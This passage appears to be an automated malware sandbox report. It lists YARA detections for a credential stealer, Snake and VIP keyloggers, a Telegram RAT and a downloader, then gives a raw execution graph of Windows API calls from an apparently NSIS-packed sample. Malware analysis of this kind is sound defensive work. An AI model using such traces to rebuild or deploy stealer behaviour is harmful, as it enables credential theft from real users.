                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false


                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:19.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:19.6%
                                                                                                                                                    Total number of Nodes:1557
                                                                                                                                                    Total number of Limit Nodes:39
                                                                                                                                                    execution_graph 3986 401941 3987 401943 3986->3987 3992 402c41 3987->3992 3993 402c4d 3992->3993 4038 4062b9 3993->4038 3996 401948 3998 4059a9 3996->3998 4080 405c74 3998->4080 4001 4059d1 DeleteFileW 4008 401951 4001->4008 4002 4059e8 4005 405b13 4002->4005 4094 406297 lstrcpynW 4002->4094 4004 405a0e 4006 405a21 4004->4006 4007 405a14 lstrcatW 4004->4007 4005->4008 4123 4065da FindFirstFileW 4005->4123 4095 405bb8 lstrlenW 4006->4095 4009 405a27 4007->4009 4012 405a37 lstrcatW 4009->4012 4013 405a2d 4009->4013 4015 405a42 lstrlenW FindFirstFileW 4012->4015 4013->4012 4013->4015 4017 405b08 4015->4017 4036 405a64 4015->4036 4016 405b31 4126 405b6c lstrlenW CharPrevW 4016->4126 4017->4005 4020 405aeb FindNextFileW 4023 405b01 FindClose 4020->4023 4020->4036 4021 405961 5 API calls 4024 405b43 4021->4024 4023->4017 4025 405b47 4024->4025 4026 405b5d 4024->4026 4025->4008 4029 4052ff 24 API calls 4025->4029 4028 4052ff 24 API calls 4026->4028 4028->4008 4031 405b54 4029->4031 4030 4059a9 60 API calls 4030->4036 4033 40605d 36 API calls 4031->4033 4032 4052ff 24 API calls 4032->4020 4034 405b5b 4033->4034 4034->4008 4036->4020 4036->4030 4036->4032 4099 406297 lstrcpynW 4036->4099 4100 405961 4036->4100 4108 4052ff 4036->4108 4119 40605d MoveFileExW 4036->4119 4042 4062c6 4038->4042 4039 406511 4040 402c6e 4039->4040 4071 406297 lstrcpynW 4039->4071 4040->3996 4055 40652b 4040->4055 4042->4039 4043 4064df lstrlenW 4042->4043 4045 4062b9 10 API calls 4042->4045 4048 4063f4 GetSystemDirectoryW 4042->4048 4049 406407 GetWindowsDirectoryW 4042->4049 4050 40652b 5 API calls 4042->4050 4051 4062b9 10 API calls 4042->4051 4052 406482 lstrcatW 4042->4052 4053 40643b SHGetSpecialFolderLocation 4042->4053 4064 406165 4042->4064 4069 4061de wsprintfW 4042->4069 4070 406297 lstrcpynW 4042->4070 4043->4042 4045->4043 4048->4042 
4049->4042 4050->4042 4051->4042 4052->4042 4053->4042 4054 406453 SHGetPathFromIDListW CoTaskMemFree 4053->4054 4054->4042 4061 406538 4055->4061 4056 4065ae 4057 4065b3 CharPrevW 4056->4057 4059 4065d4 4056->4059 4057->4056 4058 4065a1 CharNextW 4058->4056 4058->4061 4059->3996 4061->4056 4061->4058 4062 40658d CharNextW 4061->4062 4063 40659c CharNextW 4061->4063 4076 405b99 4061->4076 4062->4061 4063->4058 4072 406104 4064->4072 4067 4061c9 4067->4042 4068 406199 RegQueryValueExW RegCloseKey 4068->4067 4069->4042 4070->4042 4071->4040 4073 406113 4072->4073 4074 406117 4073->4074 4075 40611c RegOpenKeyExW 4073->4075 4074->4067 4074->4068 4075->4074 4077 405b9f 4076->4077 4078 405bb5 4077->4078 4079 405ba6 CharNextW 4077->4079 4078->4061 4079->4077 4129 406297 lstrcpynW 4080->4129 4082 405c85 4130 405c17 CharNextW CharNextW 4082->4130 4085 4059c9 4085->4001 4085->4002 4086 40652b 5 API calls 4092 405c9b 4086->4092 4087 405ccc lstrlenW 4088 405cd7 4087->4088 4087->4092 4090 405b6c 3 API calls 4088->4090 4089 4065da 2 API calls 4089->4092 4091 405cdc GetFileAttributesW 4090->4091 4091->4085 4092->4085 4092->4087 4092->4089 4093 405bb8 2 API calls 4092->4093 4093->4087 4094->4004 4096 405bc6 4095->4096 4097 405bd8 4096->4097 4098 405bcc CharPrevW 4096->4098 4097->4009 4098->4096 4098->4097 4099->4036 4136 405d68 GetFileAttributesW 4100->4136 4103 405984 DeleteFileW 4106 40598a 4103->4106 4104 40597c RemoveDirectoryW 4104->4106 4105 40598e 4105->4036 4106->4105 4107 40599a SetFileAttributesW 4106->4107 4107->4105 4110 40531a 4108->4110 4118 4053bc 4108->4118 4109 405336 lstrlenW 4112 405344 lstrlenW 4109->4112 4113 40535f 4109->4113 4110->4109 4111 4062b9 17 API calls 4110->4111 4111->4109 4114 405356 lstrcatW 4112->4114 4112->4118 4115 405372 4113->4115 4116 405365 SetWindowTextW 4113->4116 4114->4113 4117 405378 SendMessageW SendMessageW SendMessageW 4115->4117 4115->4118 4116->4115 4117->4118 4118->4036 4120 40607e 4119->4120 4121 406071 4119->4121 4120->4036 
4139 405ee3 4121->4139 4124 4065f0 FindClose 4123->4124 4125 405b2d 4123->4125 4124->4125 4125->4008 4125->4016 4127 405b37 4126->4127 4128 405b88 lstrcatW 4126->4128 4127->4021 4128->4127 4129->4082 4131 405c34 4130->4131 4135 405c46 4130->4135 4133 405c41 CharNextW 4131->4133 4131->4135 4132 405c6a 4132->4085 4132->4086 4133->4132 4134 405b99 CharNextW 4134->4135 4135->4132 4135->4134 4137 40596d 4136->4137 4138 405d7a SetFileAttributesW 4136->4138 4137->4103 4137->4104 4137->4105 4138->4137 4140 405f13 4139->4140 4141 405f39 GetShortPathNameW 4139->4141 4166 405d8d GetFileAttributesW CreateFileW 4140->4166 4143 406058 4141->4143 4144 405f4e 4141->4144 4143->4120 4144->4143 4146 405f56 wsprintfA 4144->4146 4145 405f1d CloseHandle GetShortPathNameW 4145->4143 4147 405f31 4145->4147 4148 4062b9 17 API calls 4146->4148 4147->4141 4147->4143 4149 405f7e 4148->4149 4167 405d8d GetFileAttributesW CreateFileW 4149->4167 4151 405f8b 4151->4143 4152 405f9a GetFileSize GlobalAlloc 4151->4152 4153 406051 CloseHandle 4152->4153 4154 405fbc 4152->4154 4153->4143 4168 405e10 ReadFile 4154->4168 4159 405fdb lstrcpyA 4162 405ffd 4159->4162 4160 405fef 4161 405cf2 4 API calls 4160->4161 4161->4162 4163 406034 SetFilePointer 4162->4163 4175 405e3f WriteFile 4163->4175 4166->4145 4167->4151 4169 405e2e 4168->4169 4169->4153 4170 405cf2 lstrlenA 4169->4170 4171 405d33 lstrlenA 4170->4171 4172 405d0c lstrcmpiA 4171->4172 4173 405d3b 4171->4173 4172->4173 4174 405d2a CharNextA 4172->4174 4173->4159 4173->4160 4174->4171 4176 405e5d GlobalFree 4175->4176 4176->4153 4177 4015c1 4178 402c41 17 API calls 4177->4178 4179 4015c8 4178->4179 4180 405c17 4 API calls 4179->4180 4193 4015d1 4180->4193 4181 401631 4183 401663 4181->4183 4184 401636 4181->4184 4182 405b99 CharNextW 4182->4193 4186 401423 24 API calls 4183->4186 4204 401423 4184->4204 4192 40165b 4186->4192 4191 40164a SetCurrentDirectoryW 4191->4192 4193->4181 4193->4182 4194 401617 GetFileAttributesW 4193->4194 4196 405868 
4193->4196 4199 4057ce CreateDirectoryW 4193->4199 4208 40584b CreateDirectoryW 4193->4208 4194->4193 4211 406671 GetModuleHandleA 4196->4211 4200 40581b 4199->4200 4201 40581f GetLastError 4199->4201 4200->4193 4201->4200 4202 40582e SetFileSecurityW 4201->4202 4202->4200 4203 405844 GetLastError 4202->4203 4203->4200 4205 4052ff 24 API calls 4204->4205 4206 401431 4205->4206 4207 406297 lstrcpynW 4206->4207 4207->4191 4209 40585b 4208->4209 4210 40585f GetLastError 4208->4210 4209->4193 4210->4209 4212 406697 GetProcAddress 4211->4212 4213 40668d 4211->4213 4214 40586f 4212->4214 4217 406601 GetSystemDirectoryW 4213->4217 4214->4193 4216 406693 4216->4212 4216->4214 4218 406623 wsprintfW LoadLibraryExW 4217->4218 4218->4216 5037 404344 lstrcpynW lstrlenW 5038 403945 5039 403950 5038->5039 5040 403954 5039->5040 5041 403957 GlobalAlloc 5039->5041 5041->5040 4293 401e49 4294 402c1f 17 API calls 4293->4294 4295 401e4f 4294->4295 4296 402c1f 17 API calls 4295->4296 4297 401e5b 4296->4297 4298 401e72 EnableWindow 4297->4298 4299 401e67 ShowWindow 4297->4299 4300 402ac5 4298->4300 4299->4300 5042 40264a 5043 402c1f 17 API calls 5042->5043 5044 402659 5043->5044 5045 4026a3 ReadFile 5044->5045 5046 405e10 ReadFile 5044->5046 5048 4026e3 MultiByteToWideChar 5044->5048 5049 402798 5044->5049 5051 402709 SetFilePointer MultiByteToWideChar 5044->5051 5052 4027a9 5044->5052 5054 402796 5044->5054 5055 405e6e SetFilePointer 5044->5055 5045->5044 5045->5054 5046->5044 5048->5044 5064 4061de wsprintfW 5049->5064 5051->5044 5053 4027ca SetFilePointer 5052->5053 5052->5054 5053->5054 5056 405e8a 5055->5056 5063 405ea2 5055->5063 5057 405e10 ReadFile 5056->5057 5058 405e96 5057->5058 5059 405ed3 SetFilePointer 5058->5059 5060 405eab SetFilePointer 5058->5060 5058->5063 5059->5063 5060->5059 5061 405eb6 5060->5061 5062 405e3f WriteFile 5061->5062 5062->5063 5063->5044 5064->5054 4301 6e9b2997 4302 6e9b29e7 4301->4302 4303 6e9b29a7 VirtualProtect 4301->4303 4303->4302 5068 4016cc 
5069 402c41 17 API calls 5068->5069 5070 4016d2 GetFullPathNameW 5069->5070 5071 4016ec 5070->5071 5077 40170e 5070->5077 5074 4065da 2 API calls 5071->5074 5071->5077 5072 401723 GetShortPathNameW 5073 402ac5 5072->5073 5075 4016fe 5074->5075 5075->5077 5078 406297 lstrcpynW 5075->5078 5077->5072 5077->5073 5078->5077 5079 4043cd 5080 4044ff 5079->5080 5083 4043e5 5079->5083 5081 404569 5080->5081 5085 404633 5080->5085 5090 40453a GetDlgItem SendMessageW 5080->5090 5082 404573 GetDlgItem 5081->5082 5081->5085 5086 4045f4 5082->5086 5087 40458d 5082->5087 5084 40420e 18 API calls 5083->5084 5088 40444c 5084->5088 5089 404275 8 API calls 5085->5089 5086->5085 5095 404606 5086->5095 5087->5086 5094 4045b3 SendMessageW LoadCursorW SetCursor 5087->5094 5092 40420e 18 API calls 5088->5092 5093 40462e 5089->5093 5112 404230 EnableWindow 5090->5112 5097 404459 CheckDlgButton 5092->5097 5116 40467c 5094->5116 5099 40461c 5095->5099 5100 40460c SendMessageW 5095->5100 5096 404564 5113 404658 5096->5113 5110 404230 EnableWindow 5097->5110 5099->5093 5104 404622 SendMessageW 5099->5104 5100->5099 5104->5093 5105 404477 GetDlgItem 5111 404243 SendMessageW 5105->5111 5107 40448d SendMessageW 5108 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5107->5108 5109 4044aa GetSysColor 5107->5109 5108->5093 5109->5108 5110->5105 5111->5107 5112->5096 5114 404666 5113->5114 5115 40466b SendMessageW 5113->5115 5114->5115 5115->5081 5119 4058c3 ShellExecuteExW 5116->5119 5118 4045e2 LoadCursorW SetCursor 5118->5086 5119->5118 5120 40234e 5121 402c41 17 API calls 5120->5121 5122 40235d 5121->5122 5123 402c41 17 API calls 5122->5123 5124 402366 5123->5124 5125 402c41 17 API calls 5124->5125 5126 402370 GetPrivateProfileStringW 5125->5126 5127 401b53 5128 402c41 17 API calls 5127->5128 5129 401b5a 5128->5129 5130 402c1f 17 API calls 5129->5130 5131 401b63 wsprintfW 5130->5131 5132 402ac5 5131->5132 5133 404a55 5134 404a81 5133->5134 5135 404a65 5133->5135 5137 404ab4 
5134->5137 5138 404a87 SHGetPathFromIDListW 5134->5138 5144 4058e1 GetDlgItemTextW 5135->5144 5140 404a97 5138->5140 5143 404a9e SendMessageW 5138->5143 5139 404a72 SendMessageW 5139->5134 5141 40140b 2 API calls 5140->5141 5141->5143 5143->5137 5144->5139 5145 401956 5146 402c41 17 API calls 5145->5146 5147 40195d lstrlenW 5146->5147 5148 402592 5147->5148 4923 4014d7 4924 402c1f 17 API calls 4923->4924 4925 4014dd Sleep 4924->4925 4927 402ac5 4925->4927 5149 401f58 5150 402c41 17 API calls 5149->5150 5151 401f5f 5150->5151 5152 4065da 2 API calls 5151->5152 5153 401f65 5152->5153 5155 401f76 5153->5155 5156 4061de wsprintfW 5153->5156 5156->5155 5157 402259 5158 402c41 17 API calls 5157->5158 5159 40225f 5158->5159 5160 402c41 17 API calls 5159->5160 5161 402268 5160->5161 5162 402c41 17 API calls 5161->5162 5163 402271 5162->5163 5164 4065da 2 API calls 5163->5164 5165 40227a 5164->5165 5166 40228b lstrlenW lstrlenW 5165->5166 5170 40227e 5165->5170 5167 4052ff 24 API calls 5166->5167 5169 4022c9 SHFileOperationW 5167->5169 5168 4052ff 24 API calls 5171 402286 5168->5171 5169->5170 5169->5171 5170->5168 5172 6e9b2301 5173 6e9b236b 5172->5173 5174 6e9b2376 GlobalAlloc 5173->5174 5175 6e9b2395 5173->5175 5174->5173 5176 6e9b1000 5179 6e9b101b 5176->5179 5186 6e9b1516 5179->5186 5181 6e9b1020 5182 6e9b1027 GlobalAlloc 5181->5182 5183 6e9b1024 5181->5183 5182->5183 5184 6e9b153d 3 API calls 5183->5184 5185 6e9b1019 5184->5185 5188 6e9b151c 5186->5188 5187 6e9b1522 5187->5181 5188->5187 5189 6e9b152e GlobalFree 5188->5189 5189->5181 5031 40175c 5032 402c41 17 API calls 5031->5032 5033 401763 5032->5033 5034 405dbc 2 API calls 5033->5034 5035 40176a 5034->5035 5036 405dbc 2 API calls 5035->5036 5036->5035 5190 4022dd 5191 4022e4 5190->5191 5194 4022f7 5190->5194 5192 4062b9 17 API calls 5191->5192 5193 4022f1 5192->5193 5195 4058fd MessageBoxIndirectW 5193->5195 5195->5194 5196 401d5d GetDlgItem GetClientRect 5197 402c41 17 API calls 5196->5197 5198 401d8f LoadImageW 
SendMessageW 5197->5198 5199 402ac5 5198->5199 5200 401dad DeleteObject 5198->5200 5200->5199 5201 401563 5202 402a6b 5201->5202 5205 4061de wsprintfW 5202->5205 5204 402a70 5205->5204 4224 4023e4 4225 402c41 17 API calls 4224->4225 4226 4023f6 4225->4226 4227 402c41 17 API calls 4226->4227 4228 402400 4227->4228 4241 402cd1 4228->4241 4231 40288b 4232 402438 4234 402444 4232->4234 4245 402c1f 4232->4245 4233 402c41 17 API calls 4235 40242e lstrlenW 4233->4235 4237 402463 RegSetValueExW 4234->4237 4248 403116 4234->4248 4235->4232 4239 402479 RegCloseKey 4237->4239 4239->4231 4242 402cec 4241->4242 4268 406132 4242->4268 4246 4062b9 17 API calls 4245->4246 4247 402c34 4246->4247 4247->4234 4249 40312f 4248->4249 4250 40315d 4249->4250 4275 403324 SetFilePointer 4249->4275 4272 40330e 4250->4272 4254 4032a7 4256 4032e9 4254->4256 4261 4032ab 4254->4261 4255 40317a GetTickCount 4257 403291 4255->4257 4264 4031a6 4255->4264 4259 40330e ReadFile 4256->4259 4257->4237 4258 40330e ReadFile 4258->4264 4259->4257 4260 40330e ReadFile 4260->4261 4261->4257 4261->4260 4262 405e3f WriteFile 4261->4262 4262->4261 4263 4031fc GetTickCount 4263->4264 4264->4257 4264->4258 4264->4263 4265 403221 MulDiv wsprintfW 4264->4265 4267 405e3f WriteFile 4264->4267 4266 4052ff 24 API calls 4265->4266 4266->4264 4267->4264 4269 406141 4268->4269 4270 402410 4269->4270 4271 40614c RegCreateKeyExW 4269->4271 4270->4231 4270->4232 4270->4233 4271->4270 4273 405e10 ReadFile 4272->4273 4274 403168 4273->4274 4274->4254 4274->4255 4274->4257 4275->4250 5206 6e9b103d 5207 6e9b101b 5 API calls 5206->5207 5208 6e9b1056 5207->5208 5209 402868 5210 402c41 17 API calls 5209->5210 5211 40286f FindFirstFileW 5210->5211 5212 402897 5211->5212 5215 402882 5211->5215 5217 4061de wsprintfW 5212->5217 5214 4028a0 5218 406297 lstrcpynW 5214->5218 5217->5214 5218->5215 5219 401968 5220 402c1f 17 API calls 5219->5220 5221 40196f 5220->5221 5222 402c1f 17 API calls 5221->5222 5223 40197c 5222->5223 5224 402c41 17 
API calls 5223->5224 5225 401993 lstrlenW 5224->5225 5227 4019a4 5225->5227 5226 4019e5 5227->5226 5231 406297 lstrcpynW 5227->5231 5229 4019d5 5229->5226 5230 4019da lstrlenW 5229->5230 5230->5226 5231->5229 5232 40166a 5233 402c41 17 API calls 5232->5233 5234 401670 5233->5234 5235 4065da 2 API calls 5234->5235 5236 401676 5235->5236 4304 40336c SetErrorMode GetVersion 4305 4033ab 4304->4305 4306 4033b1 4304->4306 4307 406671 5 API calls 4305->4307 4308 406601 3 API calls 4306->4308 4307->4306 4309 4033c7 lstrlenA 4308->4309 4309->4306 4310 4033d7 4309->4310 4311 406671 5 API calls 4310->4311 4312 4033de 4311->4312 4313 406671 5 API calls 4312->4313 4314 4033e5 4313->4314 4315 406671 5 API calls 4314->4315 4316 4033f1 #17 OleInitialize SHGetFileInfoW 4315->4316 4394 406297 lstrcpynW 4316->4394 4319 40343d GetCommandLineW 4395 406297 lstrcpynW 4319->4395 4321 40344f 4322 405b99 CharNextW 4321->4322 4323 403474 CharNextW 4322->4323 4324 40359e GetTempPathW 4323->4324 4334 40348d 4323->4334 4396 40333b 4324->4396 4326 4035b6 4327 403610 DeleteFileW 4326->4327 4328 4035ba GetWindowsDirectoryW lstrcatW 4326->4328 4406 402edd GetTickCount GetModuleFileNameW 4327->4406 4331 40333b 12 API calls 4328->4331 4329 405b99 CharNextW 4329->4334 4333 4035d6 4331->4333 4332 403624 4341 405b99 CharNextW 4332->4341 4376 4036c7 4332->4376 4389 4036d7 4332->4389 4333->4327 4335 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4333->4335 4334->4329 4336 403587 4334->4336 4338 403589 4334->4338 4339 40333b 12 API calls 4335->4339 4336->4324 4490 406297 lstrcpynW 4338->4490 4340 403608 4339->4340 4340->4327 4340->4389 4358 403643 4341->4358 4345 403811 4347 403895 ExitProcess 4345->4347 4348 403819 GetCurrentProcess OpenProcessToken 4345->4348 4346 4036f1 4500 4058fd 4346->4500 4350 403831 LookupPrivilegeValueW AdjustTokenPrivileges 4348->4350 4351 403865 4348->4351 4350->4351 4357 406671 5 API calls 4351->4357 4353 4036a1 4359 405c74 18 API calls 4353->4359 
4354 403707 4356 405868 5 API calls 4354->4356 4361 40370c lstrcatW 4356->4361 4365 40386c 4357->4365 4358->4353 4358->4354 4360 4036ad 4359->4360 4360->4389 4491 406297 lstrcpynW 4360->4491 4362 403728 lstrcatW lstrcmpiW 4361->4362 4363 40371d lstrcatW 4361->4363 4367 403744 4362->4367 4362->4389 4363->4362 4364 403881 ExitWindowsEx 4364->4347 4368 40388e 4364->4368 4365->4364 4365->4368 4370 403750 4367->4370 4371 403749 4367->4371 4509 40140b 4368->4509 4369 4036bc 4492 406297 lstrcpynW 4369->4492 4375 40584b 2 API calls 4370->4375 4374 4057ce 4 API calls 4371->4374 4377 40374e 4374->4377 4378 403755 SetCurrentDirectoryW 4375->4378 4434 403987 4376->4434 4377->4378 4379 403770 4378->4379 4380 403765 4378->4380 4505 406297 lstrcpynW 4379->4505 4504 406297 lstrcpynW 4380->4504 4383 4062b9 17 API calls 4384 4037af DeleteFileW 4383->4384 4385 4037bc CopyFileW 4384->4385 4391 40377e 4384->4391 4385->4391 4386 403805 4388 40605d 36 API calls 4386->4388 4387 40605d 36 API calls 4387->4391 4388->4389 4493 4038ad 4389->4493 4390 4062b9 17 API calls 4390->4391 4391->4383 4391->4386 4391->4387 4391->4390 4393 4037f0 CloseHandle 4391->4393 4506 405880 CreateProcessW 4391->4506 4393->4391 4394->4319 4395->4321 4397 40652b 5 API calls 4396->4397 4399 403347 4397->4399 4398 403351 4398->4326 4399->4398 4400 405b6c 3 API calls 4399->4400 4401 403359 4400->4401 4402 40584b 2 API calls 4401->4402 4403 40335f 4402->4403 4512 405dbc 4403->4512 4516 405d8d GetFileAttributesW CreateFileW 4406->4516 4408 402f1d 4428 402f2d 4408->4428 4517 406297 lstrcpynW 4408->4517 4410 402f43 4411 405bb8 2 API calls 4410->4411 4412 402f49 4411->4412 4518 406297 lstrcpynW 4412->4518 4414 402f54 GetFileSize 4419 402f6b 4414->4419 4431 403050 4414->4431 4416 403059 4418 403089 GlobalAlloc 4416->4418 4416->4428 4531 403324 SetFilePointer 4416->4531 4417 40330e ReadFile 4417->4419 4530 403324 SetFilePointer 4418->4530 4419->4417 4421 4030bc 4419->4421 4419->4428 4430 402e79 6 API calls 4419->4430 
4419->4431 4425 402e79 6 API calls 4421->4425 4423 403072 4426 40330e ReadFile 4423->4426 4424 4030a4 4427 403116 31 API calls 4424->4427 4425->4428 4429 40307d 4426->4429 4432 4030b0 4427->4432 4428->4332 4429->4418 4429->4428 4430->4419 4519 402e79 4431->4519 4432->4428 4433 4030ed SetFilePointer 4432->4433 4433->4428 4435 406671 5 API calls 4434->4435 4436 40399b 4435->4436 4437 4039a1 GetUserDefaultUILanguage 4436->4437 4438 4039b3 4436->4438 4536 4061de wsprintfW 4437->4536 4440 406165 3 API calls 4438->4440 4442 4039e3 4440->4442 4441 4039b1 4537 403c5d 4441->4537 4443 403a02 lstrcatW 4442->4443 4444 406165 3 API calls 4442->4444 4443->4441 4444->4443 4447 405c74 18 API calls 4448 403a34 4447->4448 4449 403ac8 4448->4449 4451 406165 3 API calls 4448->4451 4450 405c74 18 API calls 4449->4450 4452 403ace 4450->4452 4460 403a66 4451->4460 4453 403ade LoadImageW 4452->4453 4454 4062b9 17 API calls 4452->4454 4455 403b84 4453->4455 4456 403b05 RegisterClassW 4453->4456 4454->4453 4458 40140b 2 API calls 4455->4458 4457 403b3b SystemParametersInfoW CreateWindowExW 4456->4457 4489 403b8e 4456->4489 4457->4455 4463 403b8a 4458->4463 4459 403a87 lstrlenW 4461 403a95 lstrcmpiW 4459->4461 4462 403abb 4459->4462 4460->4449 4460->4459 4464 405b99 CharNextW 4460->4464 4461->4462 4465 403aa5 GetFileAttributesW 4461->4465 4466 405b6c 3 API calls 4462->4466 4469 403c5d 18 API calls 4463->4469 4463->4489 4467 403a84 4464->4467 4468 403ab1 4465->4468 4470 403ac1 4466->4470 4467->4459 4468->4462 4471 405bb8 2 API calls 4468->4471 4472 403b9b 4469->4472 4545 406297 lstrcpynW 4470->4545 4471->4462 4474 403ba7 ShowWindow 4472->4474 4475 403c2a 4472->4475 4477 406601 3 API calls 4474->4477 4546 4053d2 OleInitialize 4475->4546 4479 403bbf 4477->4479 4478 403c30 4480 403c34 4478->4480 4481 403c4c 4478->4481 4482 403bcd GetClassInfoW 4479->4482 4484 406601 3 API calls 4479->4484 4488 40140b 2 API calls 4480->4488 4480->4489 4483 40140b 2 API calls 4481->4483 4485 403be1 GetClassInfoW 
RegisterClassW 4482->4485 4486 403bf7 DialogBoxParamW 4482->4486 4483->4489 4484->4482 4485->4486 4487 40140b 2 API calls 4486->4487 4487->4489 4488->4489 4489->4389 4490->4336 4491->4369 4492->4376 4494 4038c5 4493->4494 4495 4038b7 CloseHandle 4493->4495 4564 4038f2 4494->4564 4495->4494 4498 4059a9 67 API calls 4499 4036e0 OleUninitialize 4498->4499 4499->4345 4499->4346 4501 405912 4500->4501 4502 4036ff ExitProcess 4501->4502 4503 405926 MessageBoxIndirectW 4501->4503 4503->4502 4504->4379 4505->4391 4507 4058b3 CloseHandle 4506->4507 4508 4058bf 4506->4508 4507->4508 4508->4391 4510 401389 2 API calls 4509->4510 4511 401420 4510->4511 4511->4347 4513 405dc9 GetTickCount GetTempFileNameW 4512->4513 4514 405dff 4513->4514 4515 40336a 4513->4515 4514->4513 4514->4515 4515->4326 4516->4408 4517->4410 4518->4414 4520 402e82 4519->4520 4521 402e9a 4519->4521 4522 402e92 4520->4522 4523 402e8b DestroyWindow 4520->4523 4524 402ea2 4521->4524 4525 402eaa GetTickCount 4521->4525 4522->4416 4523->4522 4532 4066ad 4524->4532 4527 402eb8 CreateDialogParamW ShowWindow 4525->4527 4528 402edb 4525->4528 4527->4528 4528->4416 4530->4424 4531->4423 4533 4066ca PeekMessageW 4532->4533 4534 4066c0 DispatchMessageW 4533->4534 4535 402ea8 4533->4535 4534->4533 4535->4416 4536->4441 4538 403c71 4537->4538 4553 4061de wsprintfW 4538->4553 4540 403ce2 4554 403d16 4540->4554 4542 403a12 4542->4447 4543 403ce7 4543->4542 4544 4062b9 17 API calls 4543->4544 4544->4543 4545->4449 4557 40425a 4546->4557 4548 40541c 4549 40425a SendMessageW 4548->4549 4550 40542e OleUninitialize 4549->4550 4550->4478 4551 4053f5 4551->4548 4560 401389 4551->4560 4553->4540 4555 4062b9 17 API calls 4554->4555 4556 403d24 SetWindowTextW 4555->4556 4556->4543 4558 404272 4557->4558 4559 404263 SendMessageW 4557->4559 4558->4551 4559->4558 4562 401390 4560->4562 4561 4013fe 4561->4551 4562->4561 4563 4013cb MulDiv SendMessageW 4562->4563 4563->4562 4565 403900 4564->4565 4566 4038ca 4565->4566 4567 403905 
FreeLibrary GlobalFree 4565->4567 4566->4498 4567->4566 4567->4567 4568 40176f 4569 402c41 17 API calls 4568->4569 4570 401776 4569->4570 4571 401796 4570->4571 4572 40179e 4570->4572 4607 406297 lstrcpynW 4571->4607 4608 406297 lstrcpynW 4572->4608 4575 4017a9 4577 405b6c 3 API calls 4575->4577 4576 40179c 4579 40652b 5 API calls 4576->4579 4578 4017af lstrcatW 4577->4578 4578->4576 4600 4017bb 4579->4600 4580 4065da 2 API calls 4580->4600 4581 405d68 2 API calls 4581->4600 4583 4017cd CompareFileTime 4583->4600 4584 40188d 4586 4052ff 24 API calls 4584->4586 4585 401864 4587 4052ff 24 API calls 4585->4587 4595 401879 4585->4595 4588 401897 4586->4588 4587->4595 4589 403116 31 API calls 4588->4589 4591 4018aa 4589->4591 4590 406297 lstrcpynW 4590->4600 4592 4018be SetFileTime 4591->4592 4594 4018d0 CloseHandle 4591->4594 4592->4594 4593 4062b9 17 API calls 4593->4600 4594->4595 4596 4018e1 4594->4596 4597 4018e6 4596->4597 4598 4018f9 4596->4598 4601 4062b9 17 API calls 4597->4601 4599 4062b9 17 API calls 4598->4599 4603 401901 4599->4603 4600->4580 4600->4581 4600->4583 4600->4584 4600->4585 4600->4590 4600->4593 4604 4058fd MessageBoxIndirectW 4600->4604 4606 405d8d GetFileAttributesW CreateFileW 4600->4606 4602 4018ee lstrcatW 4601->4602 4602->4603 4605 4058fd MessageBoxIndirectW 4603->4605 4604->4600 4605->4595 4606->4600 4607->4576 4608->4575 5237 4027ef 5238 4027f6 5237->5238 5240 402a70 5237->5240 5239 402c1f 17 API calls 5238->5239 5241 4027fd 5239->5241 5242 40280c SetFilePointer 5241->5242 5242->5240 5243 40281c 5242->5243 5245 4061de wsprintfW 5243->5245 5245->5240 5246 401a72 5247 402c1f 17 API calls 5246->5247 5248 401a7b 5247->5248 5249 402c1f 17 API calls 5248->5249 5250 401a20 5249->5250 4797 405273 4798 405283 4797->4798 4799 405297 